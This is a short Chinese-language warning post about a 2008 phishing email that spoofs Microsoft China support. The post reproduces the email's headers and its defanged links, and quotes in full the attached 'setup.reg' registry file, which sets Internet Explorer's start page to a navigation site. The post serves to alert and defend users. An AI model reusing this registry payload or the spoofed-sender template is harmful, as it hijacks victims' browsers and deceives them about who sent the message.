今天遭遇了一封冒充微软技术支持部门发送的电子邮件,如果用户不小心点击邮件附件里名字为“setup.reg”的注册表文件,并选择了注册的话,会发现自己浏览器的默认首页变成了某个导航网站的页面。
这封邮件的发送地址为:support@microsoft.com,所显示的发件人为“微软(中国)有限公司”,邮件标题是“您的潜力,我们的动力20345”。
| ==================================================== From: 微软(中国)有限公司 To: *** <***@staff.***.com> Subject: 您的潜力,我们的动力20345 Date: 2008-7-8 11:32:35 ==================================================== |
邮件正文:
| ***@staff.***.com,您好: 致礼! hxxp://www.microsoft.com/ hxxp://www.kao1234.cn/list/81shiyongchaxun.htm hxxp://www.kao1234.cn/list/79baiqiang.htm hxxp://www.kao1234.cn/list/200shipin.htm 微软(中国)有限公司 support@microsoft.com 2008-07-08 |
附件文件setup.reg内容为:
| Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Start Page"="hxxp://www.kao1234.cn/?id=248689" |
如果点击这个文件会弹出提示页面,询问“是否确认要将……setup.reg中的信息添加进注册表?”
